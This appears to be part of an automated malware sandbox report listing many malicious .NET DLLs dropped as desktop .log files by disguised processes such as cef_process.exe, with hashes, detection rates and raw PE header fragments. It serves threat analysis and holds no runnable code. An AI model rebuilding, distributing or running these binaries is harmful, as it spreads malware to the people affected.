Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FelIlyfv.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GWKYIJYf.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HOdrnIxw.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HTmgdJna.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KMBPPFZY.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MOnylpdT.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ORagGYiO.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\PqvOIQVP.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\QEeosldM.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UdNNkMkD.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UicXeyNX.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WkOFzhSS.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WtmFjUlP.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\Yimecftu.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YmBoVQXN.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YztwqAnw.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.535426842040921
Encrypted:	false
SSDEEP:	384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
MD5:	5420053AF2D273C456FB46C2CDD68F64
SHA1:	EA1808D7A8C401A68097353BB51A85F1225B429C
SHA-256:	A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
SHA-512:	DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZVuWGvdL.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZfOmxfIp.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cmPeMAqD.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\djqniAFy.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.535426842040921
Encrypted:	false
SSDEEP:	384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
MD5:	5420053AF2D273C456FB46C2CDD68F64
SHA1:	EA1808D7A8C401A68097353BB51A85F1225B429C
SHA-256:	A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
SHA-512:	DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eNXvjbiz.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	5.570953308352568
Encrypted:	false
SSDEEP:	384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:	A4F19ADB89F8D88DBDF103878CF31608
SHA1:	46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:	D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:	23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hCXTblqe.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
